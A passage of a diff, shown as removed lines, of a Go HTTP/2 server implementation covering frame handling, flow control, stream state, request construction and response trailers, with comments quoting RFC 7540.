sc.vlogf("http2: server read frame %v", summarizeFrame(f)) - } - err = sc.processFrame(f) - if err == nil { - return true - } - } - - switch ev := err.(type) { - case StreamError: - sc.resetStream(ev) - return true - case goAwayFlowError: - sc.goAway(ErrCodeFlowControl) - return true - case ConnectionError: - sc.logf("http2: server connection error from %v: %v", sc.conn.RemoteAddr(), ev) - sc.goAway(ErrCode(ev)) - return true // goAway will handle shutdown - default: - if res.err != nil { - sc.vlogf("http2: server closing client connection; error reading frame from client %s: %v", sc.conn.RemoteAddr(), err) - } else { - sc.logf("http2: server closing client connection: %v", err) - } - return false - } -} - -func (sc *serverConn) processFrame(f Frame) error { - sc.serveG.check() - - // First frame received must be SETTINGS. - if !sc.sawFirstSettings { - if _, ok := f.(*SettingsFrame); !ok { - return ConnectionError(ErrCodeProtocol) - } - sc.sawFirstSettings = true - } - - switch f := f.(type) { - case *SettingsFrame: - return sc.processSettings(f) - case *MetaHeadersFrame: - return sc.processHeaders(f) - case *WindowUpdateFrame: - return sc.processWindowUpdate(f) - case *PingFrame: - return sc.processPing(f) - case *DataFrame: - return sc.processData(f) - case *RSTStreamFrame: - return sc.processResetStream(f) - case *PriorityFrame: - return sc.processPriority(f) - case *GoAwayFrame: - return sc.processGoAway(f) - case *PushPromiseFrame: - // A client cannot push. Thus, servers MUST treat the receipt of a PUSH_PROMISE - // frame as a connection error (Section 5.4.1) of type PROTOCOL_ERROR. - return ConnectionError(ErrCodeProtocol) - default: - sc.vlogf("http2: server ignoring frame: %v", f.Header()) - return nil - } -} - -func (sc *serverConn) processPing(f *PingFrame) error { - sc.serveG.check() - if f.IsAck() { - // 6.7 PING: " An endpoint MUST NOT respond to PING frames - // containing this flag." - return nil - } - if f.StreamID != 0 { - // "PING frames are not associated with any individual - // stream. If a PING frame is received with a stream - // identifier field value other than 0x0, the recipient MUST - // respond with a connection error (Section 5.4.1) of type - // PROTOCOL_ERROR." - return ConnectionError(ErrCodeProtocol) - } - if sc.inGoAway && sc.goAwayCode != ErrCodeNo { - return nil - } - sc.writeFrame(FrameWriteRequest{write: writePingAck{f}}) - return nil -} - -func (sc *serverConn) processWindowUpdate(f *WindowUpdateFrame) error { - sc.serveG.check() - switch { - case f.StreamID != 0: // stream-level flow control - state, st := sc.state(f.StreamID) - if state == stateIdle { - // Section 5.1: "Receiving any frame other than HEADERS - // or PRIORITY on a stream in this state MUST be - // treated as a connection error (Section 5.4.1) of - // type PROTOCOL_ERROR." - return ConnectionError(ErrCodeProtocol) - } - if st == nil { - // "WINDOW_UPDATE can be sent by a peer that has sent a - // frame bearing the END_STREAM flag. This means that a - // receiver could receive a WINDOW_UPDATE frame on a "half - // closed (remote)" or "closed" stream. A receiver MUST - // NOT treat this as an error, see Section 5.1." - return nil - } - if !st.flow.add(int32(f.Increment)) { - return streamError(f.StreamID, ErrCodeFlowControl) - } - default: // connection-level flow control - if !sc.flow.add(int32(f.Increment)) { - return goAwayFlowError{} - } - } - sc.scheduleFrameWrite() - return nil -} - -func (sc *serverConn) processResetStream(f *RSTStreamFrame) error { - sc.serveG.check() - - state, st := sc.state(f.StreamID) - if state == stateIdle { - // 6.4 "RST_STREAM frames MUST NOT be sent for a - // stream in the "idle" state. If a RST_STREAM frame - // identifying an idle stream is received, the - // recipient MUST treat this as a connection error - // (Section 5.4.1) of type PROTOCOL_ERROR. - return ConnectionError(ErrCodeProtocol) - } - if st != nil { - st.cancelCtx() - sc.closeStream(st, streamError(f.StreamID, f.ErrCode)) - } - return nil -} - -func (sc *serverConn) closeStream(st *stream, err error) { - sc.serveG.check() - if st.state == stateIdle || st.state == stateClosed { - panic(fmt.Sprintf("invariant; can't close stream in state %v", st.state)) - } - st.state = stateClosed - if st.writeDeadline != nil { - st.writeDeadline.Stop() - } - if st.isPushed() { - sc.curPushedStreams-- - } else { - sc.curClientStreams-- - } - delete(sc.streams, st.id) - if len(sc.streams) == 0 { - sc.setConnState(http.StateIdle) - if sc.srv.IdleTimeout != 0 { - sc.idleTimer.Reset(sc.srv.IdleTimeout) - } - if h1ServerKeepAlivesDisabled(sc.hs) { - sc.startGracefulShutdownInternal() - } - } - if p := st.body; p != nil { - // Return any buffered unread bytes worth of conn-level flow control. - // See golang.org/issue/16481 - sc.sendWindowUpdate(nil, p.Len()) - - p.CloseWithError(err) - } - st.cw.Close() // signals Handler's CloseNotifier, unblocks writes, etc - sc.writeSched.CloseStream(st.id) -} - -func (sc *serverConn) processSettings(f *SettingsFrame) error { - sc.serveG.check() - if f.IsAck() { - sc.unackedSettings-- - if sc.unackedSettings < 0 { - // Why is the peer ACKing settings we never sent? - // The spec doesn't mention this case, but - // hang up on them anyway. - return ConnectionError(ErrCodeProtocol) - } - return nil - } - if err := f.ForeachSetting(sc.processSetting); err != nil { - return err - } - sc.needToSendSettingsAck = true - sc.scheduleFrameWrite() - return nil -} - -func (sc *serverConn) processSetting(s Setting) error { - sc.serveG.check() - if err := s.Valid(); err != nil { - return err - } - if VerboseLogs { - sc.vlogf("http2: server processing setting %v", s) - } - switch s.ID { - case SettingHeaderTableSize: - sc.headerTableSize = s.Val - sc.hpackEncoder.SetMaxDynamicTableSize(s.Val) - case SettingEnablePush: - sc.pushEnabled = s.Val != 0 - case SettingMaxConcurrentStreams: - sc.clientMaxStreams = s.Val - case SettingInitialWindowSize: - return sc.processSettingInitialWindowSize(s.Val) - case SettingMaxFrameSize: - sc.maxFrameSize = int32(s.Val) // the maximum valid s.Val is < 2^31 - case SettingMaxHeaderListSize: - sc.peerMaxHeaderListSize = s.Val - default: - // Unknown setting: "An endpoint that receives a SETTINGS - // frame with any unknown or unsupported identifier MUST - // ignore that setting." - if VerboseLogs { - sc.vlogf("http2: server ignoring unknown setting %v", s) - } - } - return nil -} - -func (sc *serverConn) processSettingInitialWindowSize(val uint32) error { - sc.serveG.check() - // Note: val already validated to be within range by - // processSetting's Valid call. - - // "A SETTINGS frame can alter the initial flow control window - // size for all current streams. When the value of - // SETTINGS_INITIAL_WINDOW_SIZE changes, a receiver MUST - // adjust the size of all stream flow control windows that it - // maintains by the difference between the new value and the - // old value." - old := sc.initialStreamSendWindowSize - sc.initialStreamSendWindowSize = int32(val) - growth := int32(val) - old // may be negative - for _, st := range sc.streams { - if !st.flow.add(growth) { - // 6.9.2 Initial Flow Control Window Size - // "An endpoint MUST treat a change to - // SETTINGS_INITIAL_WINDOW_SIZE that causes any flow - // control window to exceed the maximum size as a - // connection error (Section 5.4.1) of type - // FLOW_CONTROL_ERROR." - return ConnectionError(ErrCodeFlowControl) - } - } - return nil -} - -func (sc *serverConn) processData(f *DataFrame) error { - sc.serveG.check() - if sc.inGoAway && sc.goAwayCode != ErrCodeNo { - return nil - } - data := f.Data() - - // "If a DATA frame is received whose stream is not in "open" - // or "half closed (local)" state, the recipient MUST respond - // with a stream error (Section 5.4.2) of type STREAM_CLOSED." - id := f.Header().StreamID - state, st := sc.state(id) - if id == 0 || state == stateIdle { - // Section 5.1: "Receiving any frame other than HEADERS - // or PRIORITY on a stream in this state MUST be - // treated as a connection error (Section 5.4.1) of - // type PROTOCOL_ERROR." - return ConnectionError(ErrCodeProtocol) - } - if st == nil || state != stateOpen || st.gotTrailerHeader || st.resetQueued { - // This includes sending a RST_STREAM if the stream is - // in stateHalfClosedLocal (which currently means that - // the http.Handler returned, so it's done reading & - // done writing). Try to stop the client from sending - // more DATA. - - // But still enforce their connection-level flow control, - // and return any flow control bytes since we're not going - // to consume them. - if sc.inflow.available() < int32(f.Length) { - return streamError(id, ErrCodeFlowControl) - } - // Deduct the flow control from inflow, since we're - // going to immediately add it back in - // sendWindowUpdate, which also schedules sending the - // frames. - sc.inflow.take(int32(f.Length)) - sc.sendWindowUpdate(nil, int(f.Length)) // conn-level - - if st != nil && st.resetQueued { - // Already have a stream error in flight. Don't send another. - return nil - } - return streamError(id, ErrCodeStreamClosed) - } - if st.body == nil { - panic("internal error: should have a body in this state") - } - - // Sender sending more than they'd declared? - if st.declBodyBytes != -1 && st.bodyBytes+int64(len(data)) > st.declBodyBytes { - st.body.CloseWithError(fmt.Errorf("sender tried to send more than declared Content-Length of %d bytes", st.declBodyBytes)) - return streamError(id, ErrCodeStreamClosed) - } - if f.Length > 0 { - // Check whether the client has flow control quota. - if st.inflow.available() < int32(f.Length) { - return streamError(id, ErrCodeFlowControl) - } - st.inflow.take(int32(f.Length)) - - if len(data) > 0 { - wrote, err := st.body.Write(data) - if err != nil { - return streamError(id, ErrCodeStreamClosed) - } - if wrote != len(data) { - panic("internal error: bad Writer") - } - st.bodyBytes += int64(len(data)) - } - - // Return any padded flow control now, since we won't - // refund it later on body reads. - if pad := int32(f.Length) - int32(len(data)); pad > 0 { - sc.sendWindowUpdate32(nil, pad) - sc.sendWindowUpdate32(st, pad) - } - } - if f.StreamEnded() { - st.endStream() - } - return nil -} - -func (sc *serverConn) processGoAway(f *GoAwayFrame) error { - sc.serveG.check() - if f.ErrCode != ErrCodeNo { - sc.logf("http2: received GOAWAY %+v, starting graceful shutdown", f) - } else { - sc.vlogf("http2: received GOAWAY %+v, starting graceful shutdown", f) - } - sc.startGracefulShutdownInternal() - // http://tools.ietf.org/html/rfc7540#section-6.8 - // We should not create any new streams, which means we should disable push. - sc.pushEnabled = false - return nil -} - -// isPushed reports whether the stream is server-initiated. -func (st *stream) isPushed() bool { - return st.id%2 == 0 -} - -// endStream closes a Request.Body's pipe. It is called when a DATA -// frame says a request body is over (or after trailers). -func (st *stream) endStream() { - sc := st.sc - sc.serveG.check() - - if st.declBodyBytes != -1 && st.declBodyBytes != st.bodyBytes { - st.body.CloseWithError(fmt.Errorf("request declared a Content-Length of %d but only wrote %d bytes", - st.declBodyBytes, st.bodyBytes)) - } else { - st.body.closeWithErrorAndCode(io.EOF, st.copyTrailersToHandlerRequest) - st.body.CloseWithError(io.EOF) - } - st.state = stateHalfClosedRemote -} - -// copyTrailersToHandlerRequest is run in the Handler's goroutine in -// its Request.Body.Read just before it gets io.EOF. -func (st *stream) copyTrailersToHandlerRequest() { - for k, vv := range st.trailer { - if _, ok := st.reqTrailer[k]; ok { - // Only copy it over it was pre-declared. - st.reqTrailer[k] = vv - } - } -} - -// onWriteTimeout is run on its own goroutine (from time.AfterFunc) -// when the stream's WriteTimeout has fired. -func (st *stream) onWriteTimeout() { - st.sc.writeFrameFromHandler(FrameWriteRequest{write: streamError(st.id, ErrCodeInternal)}) -} - -func (sc *serverConn) processHeaders(f *MetaHeadersFrame) error { - sc.serveG.check() - id := f.StreamID - if sc.inGoAway { - // Ignore. - return nil - } - // http://tools.ietf.org/html/rfc7540#section-5.1.1 - // Streams initiated by a client MUST use odd-numbered stream - // identifiers. [...] An endpoint that receives an unexpected - // stream identifier MUST respond with a connection error - // (Section 5.4.1) of type PROTOCOL_ERROR. - if id%2 != 1 { - return ConnectionError(ErrCodeProtocol) - } - // A HEADERS frame can be used to create a new stream or - // send a trailer for an open one. If we already have a stream - // open, let it process its own HEADERS frame (trailers at this - // point, if it's valid). - if st := sc.streams[f.StreamID]; st != nil { - if st.resetQueued { - // We're sending RST_STREAM to close the stream, so don't bother - // processing this frame. - return nil - } - return st.processTrailerHeaders(f) - } - - // [...] The identifier of a newly established stream MUST be - // numerically greater than all streams that the initiating - // endpoint has opened or reserved. [...] An endpoint that - // receives an unexpected stream identifier MUST respond with - // a connection error (Section 5.4.1) of type PROTOCOL_ERROR. - if id <= sc.maxClientStreamID { - return ConnectionError(ErrCodeProtocol) - } - sc.maxClientStreamID = id - - if sc.idleTimer != nil { - sc.idleTimer.Stop() - } - - // http://tools.ietf.org/html/rfc7540#section-5.1.2 - // [...] Endpoints MUST NOT exceed the limit set by their peer. An - // endpoint that receives a HEADERS frame that causes their - // advertised concurrent stream limit to be exceeded MUST treat - // this as a stream error (Section 5.4.2) of type PROTOCOL_ERROR - // or REFUSED_STREAM. - if sc.curClientStreams+1 > sc.advMaxStreams { - if sc.unackedSettings == 0 { - // They should know better. - return streamError(id, ErrCodeProtocol) - } - // Assume it's a network race, where they just haven't - // received our last SETTINGS update. But actually - // this can't happen yet, because we don't yet provide - // a way for users to adjust server parameters at - // runtime. - return streamError(id, ErrCodeRefusedStream) - } - - initialState := stateOpen - if f.StreamEnded() { - initialState = stateHalfClosedRemote - } - st := sc.newStream(id, 0, initialState) - - if f.HasPriority() { - if err := checkPriority(f.StreamID, f.Priority); err != nil { - return err - } - sc.writeSched.AdjustStream(st.id, f.Priority) - } - - rw, req, err := sc.newWriterAndRequest(st, f) - if err != nil { - return err - } - st.reqTrailer = req.Trailer - if st.reqTrailer != nil { - st.trailer = make(http.Header) - } - st.body = req.Body.(*requestBody).pipe // may be nil - st.declBodyBytes = req.ContentLength - - handler := sc.handler.ServeHTTP - if f.Truncated { - // Their header list was too long. Send a 431 error. - handler = handleHeaderListTooLong - } else if err := checkValidHTTP2RequestHeaders(req.Header); err != nil { - handler = new400Handler(err) - } - - // The net/http package sets the read deadline from the - // http.Server.ReadTimeout during the TLS handshake, but then - // passes the connection off to us with the deadline already - // set. Disarm it here after the request headers are read, - // similar to how the http1 server works. Here it's - // technically more like the http1 Server's ReadHeaderTimeout - // (in Go 1.8), though. That's a more sane option anyway. - if sc.hs.ReadTimeout != 0 { - sc.conn.SetReadDeadline(time.Time{}) - } - - go sc.runHandler(rw, req, handler) - return nil -} - -func (st *stream) processTrailerHeaders(f *MetaHeadersFrame) error { - sc := st.sc - sc.serveG.check() - if st.gotTrailerHeader { - return ConnectionError(ErrCodeProtocol) - } - st.gotTrailerHeader = true - if !f.StreamEnded() { - return streamError(st.id, ErrCodeProtocol) - } - - if len(f.PseudoFields()) > 0 { - return streamError(st.id, ErrCodeProtocol) - } - if st.trailer != nil { - for _, hf := range f.RegularFields() { - key := sc.canonicalHeader(hf.Name) - if !ValidTrailerHeader(key) { - // TODO: send more details to the peer somehow. But http2 has - // no way to send debug data at a stream level. Discuss with - // HTTP folk. - return streamError(st.id, ErrCodeProtocol) - } - st.trailer[key] = append(st.trailer[key], hf.Value) - } - } - st.endStream() - return nil -} - -func checkPriority(streamID uint32, p PriorityParam) error { - if streamID == p.StreamDep { - // Section 5.3.1: "A stream cannot depend on itself. An endpoint MUST treat - // this as a stream error (Section 5.4.2) of type PROTOCOL_ERROR." - // Section 5.3.3 says that a stream can depend on one of its dependencies, - // so it's only self-dependencies that are forbidden. - return streamError(streamID, ErrCodeProtocol) - } - return nil -} - -func (sc *serverConn) processPriority(f *PriorityFrame) error { - if sc.inGoAway { - return nil - } - if err := checkPriority(f.StreamID, f.PriorityParam); err != nil { - return err - } - sc.writeSched.AdjustStream(f.StreamID, f.PriorityParam) - return nil -} - -func (sc *serverConn) newStream(id, pusherID uint32, state streamState) *stream { - sc.serveG.check() - if id == 0 { - panic("internal error: cannot create stream with id 0") - } - - ctx, cancelCtx := contextWithCancel(sc.baseCtx) - st := &stream{ - sc: sc, - id: id, - state: state, - ctx: ctx, - cancelCtx: cancelCtx, - } - st.cw.Init() - st.flow.conn = &sc.flow // link to conn-level counter - st.flow.add(sc.initialStreamSendWindowSize) - st.inflow.conn = &sc.inflow // link to conn-level counter - st.inflow.add(sc.srv.initialStreamRecvWindowSize()) - if sc.hs.WriteTimeout != 0 { - st.writeDeadline = time.AfterFunc(sc.hs.WriteTimeout, st.onWriteTimeout) - } - - sc.streams[id] = st - sc.writeSched.OpenStream(st.id, OpenStreamOptions{PusherID: pusherID}) - if st.isPushed() { - sc.curPushedStreams++ - } else { - sc.curClientStreams++ - } - if sc.curOpenStreams() == 1 { - sc.setConnState(http.StateActive) - } - - return st -} - -func (sc *serverConn) newWriterAndRequest(st *stream, f *MetaHeadersFrame) (*responseWriter, *http.Request, error) { - sc.serveG.check() - - rp := requestParam{ - method: f.PseudoValue("method"), - scheme: f.PseudoValue("scheme"), - authority: f.PseudoValue("authority"), - path: f.PseudoValue("path"), - } - - isConnect := rp.method == "CONNECT" - if isConnect { - if rp.path != "" || rp.scheme != "" || rp.authority == "" { - return nil, nil, streamError(f.StreamID, ErrCodeProtocol) - } - } else if rp.method == "" || rp.path == "" || (rp.scheme != "https" && rp.scheme != "http") { - // See 8.1.2.6 Malformed Requests and Responses: - // - // Malformed requests or responses that are detected - // MUST be treated as a stream error (Section 5.4.2) - // of type PROTOCOL_ERROR." - // - // 8.1.2.3 Request Pseudo-Header Fields - // "All HTTP/2 requests MUST include exactly one valid - // value for the :method, :scheme, and :path - // pseudo-header fields" - return nil, nil, streamError(f.StreamID, ErrCodeProtocol) - } - - bodyOpen := !f.StreamEnded() - if rp.method == "HEAD" && bodyOpen { - // HEAD requests can't have bodies - return nil, nil, streamError(f.StreamID, ErrCodeProtocol) - } - - rp.header = make(http.Header) - for _, hf := range f.RegularFields() { - rp.header.Add(sc.canonicalHeader(hf.Name), hf.Value) - } - if rp.authority == "" { - rp.authority = rp.header.Get("Host") - } - - rw, req, err := sc.newWriterAndRequestNoBody(st, rp) - if err != nil { - return nil, nil, err - } - if bodyOpen { - if vv, ok := rp.header["Content-Length"]; ok { - req.ContentLength, _ = strconv.ParseInt(vv[0], 10, 64) - } else { - req.ContentLength = -1 - } - req.Body.(*requestBody).pipe = &pipe{ - b: &dataBuffer{expected: req.ContentLength}, - } - } - return rw, req, nil -} - -type requestParam struct { - method string - scheme, authority, path string - header http.Header -} - -func (sc *serverConn) newWriterAndRequestNoBody(st *stream, rp requestParam) (*responseWriter, *http.Request, error) { - sc.serveG.check() - - var tlsState *tls.ConnectionState // nil if not scheme https - if rp.scheme == "https" { - tlsState = sc.tlsState - } - - needsContinue := rp.header.Get("Expect") == "100-continue" - if needsContinue { - rp.header.Del("Expect") - } - // Merge Cookie headers into one "; "-delimited value. - if cookies := rp.header["Cookie"]; len(cookies) > 1 { - rp.header.Set("Cookie", strings.Join(cookies, "; ")) - } - - // Setup Trailers - var trailer http.Header - for _, v := range rp.header["Trailer"] { - for _, key := range strings.Split(v, ",") { - key = http.CanonicalHeaderKey(strings.TrimSpace(key)) - switch key { - case "Transfer-Encoding", "Trailer", "Content-Length": - // Bogus. (copy of http1 rules) - // Ignore. - default: - if trailer == nil { - trailer = make(http.Header) - } - trailer[key] = nil - } - } - } - delete(rp.header, "Trailer") - - var url_ *url.URL - var requestURI string - if rp.method == "CONNECT" { - url_ = &url.URL{Host: rp.authority} - requestURI = rp.authority // mimic HTTP/1 server behavior - } else { - var err error - url_, err = url.ParseRequestURI(rp.path) - if err != nil { - return nil, nil, streamError(st.id, ErrCodeProtocol) - } - requestURI = rp.path - } - - body := &requestBody{ - conn: sc, - stream: st, - needsContinue: needsContinue, - } - req := &http.Request{ - Method: rp.method, - URL: url_, - RemoteAddr: sc.remoteAddrStr, - Header: rp.header, - RequestURI: requestURI, - Proto: "HTTP/2.0", - ProtoMajor: 2, - ProtoMinor: 0, - TLS: tlsState, - Host: rp.authority, - Body: body, - Trailer: trailer, - } - req = requestWithContext(req, st.ctx) - - rws := responseWriterStatePool.Get().(*responseWriterState) - bwSave := rws.bw - *rws = responseWriterState{} // zero all the fields - rws.conn = sc - rws.bw = bwSave - rws.bw.Reset(chunkWriter{rws}) - rws.stream = st - rws.req = req - rws.body = body - - rw := &responseWriter{rws: rws} - return rw, req, nil -} - -// Run on its own goroutine. -func (sc *serverConn) runHandler(rw *responseWriter, req *http.Request, handler func(http.ResponseWriter, *http.Request)) { - didPanic := true - defer func() { - rw.rws.stream.cancelCtx() - if didPanic { - e := recover() - sc.writeFrameFromHandler(FrameWriteRequest{ - write: handlerPanicRST{rw.rws.stream.id}, - stream: rw.rws.stream, - }) - // Same as net/http: - if shouldLogPanic(e) { - const size = 64 << 10 - buf := make([]byte, size) - buf = buf[:runtime.Stack(buf, false)] - sc.logf("http2: panic serving %v: %v\n%s", sc.conn.RemoteAddr(), e, buf) - } - return - } - rw.handlerDone() - }() - handler(rw, req) - didPanic = false -} - -func handleHeaderListTooLong(w http.ResponseWriter, r *http.Request) { - // 10.5.1 Limits on Header Block Size: - // .. "A server that receives a larger header block than it is - // willing to handle can send an HTTP 431 (Request Header Fields Too - // Large) status code" - const statusRequestHeaderFieldsTooLarge = 431 // only in Go 1.6+ - w.WriteHeader(statusRequestHeaderFieldsTooLarge) - io.WriteString(w, "

HTTP Error 431

Request Header Field(s) Too Large

") -} - -// called from handler goroutines. -// h may be nil. -func (sc *serverConn) writeHeaders(st *stream, headerData *writeResHeaders) error { - sc.serveG.checkNotOn() // NOT on - var errc chan error - if headerData.h != nil { - // If there's a header map (which we don't own), so we have to block on - // waiting for this frame to be written, so an http.Flush mid-handler - // writes out the correct value of keys, before a handler later potentially - // mutates it. - errc = errChanPool.Get().(chan error) - } - if err := sc.writeFrameFromHandler(FrameWriteRequest{ - write: headerData, - stream: st, - done: errc, - }); err != nil { - return err - } - if errc != nil { - select { - case err := <-errc: - errChanPool.Put(errc) - return err - case <-sc.doneServing: - return errClientDisconnected - case <-st.cw: - return errStreamClosed - } - } - return nil -} - -// called from handler goroutines. -func (sc *serverConn) write100ContinueHeaders(st *stream) { - sc.writeFrameFromHandler(FrameWriteRequest{ - write: write100ContinueHeadersFrame{st.id}, - stream: st, - }) -} - -// A bodyReadMsg tells the server loop that the http.Handler read n -// bytes of the DATA from the client on the given stream. -type bodyReadMsg struct { - st *stream - n int -} - -// called from handler goroutines. -// Notes that the handler for the given stream ID read n bytes of its body -// and schedules flow control tokens to be sent. -func (sc *serverConn) noteBodyReadFromHandler(st *stream, n int, err error) { - sc.serveG.checkNotOn() // NOT on - if n > 0 { - select { - case sc.bodyReadCh <- bodyReadMsg{st, n}: - case <-sc.doneServing: - } - } -} - -func (sc *serverConn) noteBodyRead(st *stream, n int) { - sc.serveG.check() - sc.sendWindowUpdate(nil, n) // conn-level - if st.state != stateHalfClosedRemote && st.state != stateClosed { - // Don't send this WINDOW_UPDATE if the stream is closed - // remotely. - sc.sendWindowUpdate(st, n) - } -} - -// st may be nil for conn-level -func (sc *serverConn) sendWindowUpdate(st *stream, n int) { - sc.serveG.check() - // "The legal range for the increment to the flow control - // window is 1 to 2^31-1 (2,147,483,647) octets." - // A Go Read call on 64-bit machines could in theory read - // a larger Read than this. Very unlikely, but we handle it here - // rather than elsewhere for now. - const maxUint31 = 1<<31 - 1 - for n >= maxUint31 { - sc.sendWindowUpdate32(st, maxUint31) - n -= maxUint31 - } - sc.sendWindowUpdate32(st, int32(n)) -} - -// st may be nil for conn-level -func (sc *serverConn) sendWindowUpdate32(st *stream, n int32) { - sc.serveG.check() - if n == 0 { - return - } - if n < 0 { - panic("negative update") - } - var streamID uint32 - if st != nil { - streamID = st.id - } - sc.writeFrame(FrameWriteRequest{ - write: writeWindowUpdate{streamID: streamID, n: uint32(n)}, - stream: st, - }) - var ok bool - if st == nil { - ok = sc.inflow.add(n) - } else { - ok = st.inflow.add(n) - } - if !ok { - panic("internal error; sent too many window updates without decrements?") - } -} - -// requestBody is the Handler's Request.Body type. -// Read and Close may be called concurrently. -type requestBody struct { - stream *stream - conn *serverConn - closed bool // for use by Close only - sawEOF bool // for use by Read only - pipe *pipe // non-nil if we have a HTTP entity message body - needsContinue bool // need to send a 100-continue -} - -func (b *requestBody) Close() error { - if b.pipe != nil && !b.closed { - b.pipe.BreakWithError(errClosedBody) - } - b.closed = true - return nil -} - -func (b *requestBody) Read(p []byte) (n int, err error) { - if b.needsContinue { - b.needsContinue = false - b.conn.write100ContinueHeaders(b.stream) - } - if b.pipe == nil || b.sawEOF { - return 0, io.EOF - } - n, err = b.pipe.Read(p) - if err == io.EOF { - b.sawEOF = true - } - if b.conn == nil && inTests { - return - } - b.conn.noteBodyReadFromHandler(b.stream, n, err) - return -} - -// responseWriter is the http.ResponseWriter implementation. It's -// intentionally small (1 pointer wide) to minimize garbage. The -// responseWriterState pointer inside is zeroed at the end of a -// request (in handlerDone) and calls on the responseWriter thereafter -// simply crash (caller's mistake), but the much larger responseWriterState -// and buffers are reused between multiple requests. -type responseWriter struct { - rws *responseWriterState -} - -// Optional http.ResponseWriter interfaces implemented. -var ( - _ http.CloseNotifier = (*responseWriter)(nil) - _ http.Flusher = (*responseWriter)(nil) - _ stringWriter = (*responseWriter)(nil) -) - -type responseWriterState struct { - // immutable within a request: - stream *stream - req *http.Request - body *requestBody // to close at end of request, if DATA frames didn't - conn *serverConn - - // TODO: adjust buffer writing sizes based on server config, frame size updates from peer, etc - bw *bufio.Writer // writing to a chunkWriter{this *responseWriterState} - - // mutated by http.Handler goroutine: - handlerHeader http.Header // nil until called - snapHeader http.Header // snapshot of handlerHeader at WriteHeader time - trailers []string // set in writeChunk - status int // status code passed to WriteHeader - wroteHeader bool // WriteHeader called (explicitly or implicitly). Not necessarily sent to user yet. - sentHeader bool // have we sent the header frame? - handlerDone bool // handler has finished - dirty bool // a Write failed; don't reuse this responseWriterState - - sentContentLen int64 // non-zero if handler set a Content-Length header - wroteBytes int64 - - closeNotifierMu sync.Mutex // guards closeNotifierCh - closeNotifierCh chan bool // nil until first used -} - -type chunkWriter struct{ rws *responseWriterState } - -func (cw chunkWriter) Write(p []byte) (n int, err error) { return cw.rws.writeChunk(p) } - -func (rws *responseWriterState) hasTrailers() bool { return len(rws.trailers) != 0 } - -// declareTrailer is called for each Trailer header when the -// response header is written. It notes that a header will need to be -// written in the trailers at the end of the response. -func (rws *responseWriterState) declareTrailer(k string) { - k = http.CanonicalHeaderKey(k) - if !ValidTrailerHeader(k) { - // Forbidden by RFC 2616 14.40. - rws.conn.logf("ignoring invalid trailer %q", k) - return - } - if !strSliceContains(rws.trailers, k) { - rws.trailers = append(rws.trailers, k) - } -} - -// writeChunk writes chunks from the bufio.Writer. But because -// bufio.Writer may bypass its chunking, sometimes p may be -// arbitrarily large. -// -// writeChunk is also responsible (on the first chunk) for sending the -// HEADER response. -func (rws *responseWriterState) writeChunk(p []byte) (n int, err error) { - if !rws.wroteHeader { - rws.writeHeader(200) - } - - isHeadResp := rws.req.Method == "HEAD" - if !rws.sentHeader { - rws.sentHeader = true - var ctype, clen string - if clen = rws.snapHeader.Get("Content-Length"); clen != "" { - rws.snapHeader.Del("Content-Length") - clen64, err := strconv.ParseInt(clen, 10, 64) - if err == nil && clen64 >= 0 { - rws.sentContentLen = clen64 - } else { - clen = "" - } - } - if clen == "" && rws.handlerDone && bodyAllowedForStatus(rws.status) && (len(p) > 0 || !isHeadResp) { - clen = strconv.Itoa(len(p)) - } - _, hasContentType := rws.snapHeader["Content-Type"] - if !hasContentType && bodyAllowedForStatus(rws.status) { - ctype = http.DetectContentType(p) - } - var date string - if _, ok := rws.snapHeader["Date"]; !ok { - // TODO(bradfitz): be faster here, like net/http? measure. - date = time.Now().UTC().Format(http.TimeFormat) - } - - for _, v := range rws.snapHeader["Trailer"] { - foreachHeaderElement(v, rws.declareTrailer) - } - - endStream := (rws.handlerDone && !rws.hasTrailers() && len(p) == 0) || isHeadResp - err = rws.conn.writeHeaders(rws.stream, &writeResHeaders{ - streamID: rws.stream.id, - httpResCode: rws.status, - h: rws.snapHeader, - endStream: endStream, - contentType: ctype, - contentLength: clen, - date: date, - }) - if err != nil { - rws.dirty = true - return 0, err - } - if endStream { - return 0, nil - } - } - if isHeadResp { - return len(p), nil - } - if len(p) == 0 && !rws.handlerDone { - return 0, nil - } - - if rws.handlerDone { - rws.promoteUndeclaredTrailers() - } - - endStream := rws.handlerDone && !rws.hasTrailers() - if len(p) > 0 || endStream { - // only send a 0 byte DATA frame if we're ending the stream. - if err := rws.conn.writeDataFromHandler(rws.stream, p, endStream); err != nil { - rws.dirty = true - return 0, err - } - } - - if rws.handlerDone && rws.hasTrailers() { - err = rws.conn.writeHeaders(rws.stream, &writeResHeaders{ - streamID: rws.stream.id, - h: rws.handlerHeader, - trailers: rws.trailers, - endStream: true, - }) - if err != nil { - rws.dirty = true - } - return len(p), err - } - return len(p), nil -} - -// TrailerPrefix is a magic prefix for ResponseWriter.Header map keys -// that, if present, signals that the map entry is actually for -// the response trailers, and not the response headers. The prefix -// is stripped after the ServeHTTP call finishes and the values are -// sent in the trailers. -// -// This mechanism is intended only for trailers that are not known -// prior to the headers being written. If the set of trailers is fixed -// or known before the header is written, the normal Go trailers mechanism -// is preferred: -// https://golang.org/pkg/net/http/#ResponseWriter -// https://golang.org/pkg/net/http/#example_ResponseWriter_trailers -const TrailerPrefix = "Trailer:" - -// promoteUndeclaredTrailers permits http.Handlers to set trailers -// after the header has already been flushed. Because the Go -// ResponseWriter interface has no way to set Trailers (only the -// Header), and because we didn't want to expand the ResponseWriter -// interface, and because nobody used trailers, and because RFC 2616 -// says you SHOULD (but not must) predeclare any trailers in the -// header, the official ResponseWriter rules said trailers in Go must -// be predeclared, and then we reuse the same ResponseWriter.Header() -// map to mean both Headers and Trailers. When it's time to write the -// Trailers, we pick out the fields of Headers that were declared as -// trailers. That worked for a while, until we found the first major -// user of Trailers in the wild: gRPC (using them only over http2), -// and gRPC libraries permit setting trailers mid-stream without -// predeclarnig them. So: change of plans. We still permit the old -// way, but we also permit this hack: if a Header() key begins with -// "Trailer:", the suffix of that key is a Trailer. Because ':' is an -// invalid token byte anyway, there is no ambiguity. (And it's already -// filtered out) It's mildly hacky, but not terrible. -// -// This method runs after the Handler is done and promotes any Header -// fields to be trailers. -func (rws *responseWriterState) promoteUndeclaredTrailers() { - for k, vv := range rws.handlerHeader { - if !strings.HasPrefix(k, TrailerPrefix) { - continue - } - trailerKey := strings.TrimPrefix(k, TrailerPrefix) - rws.declareTrailer(trailerKey) - rws.handlerHeader[http.CanonicalHeaderKey(trailerKey)] = vv - } - - if len(rws.trailers) > 1 { - sorter := sorterPool.Get().(*sorter) - sorter.SortStrings(rws.trailers) - sorterPool.Put(sorter) - } -} - -func (w *responseWriter) Flush() { - rws := w.rws - if rws == nil { - 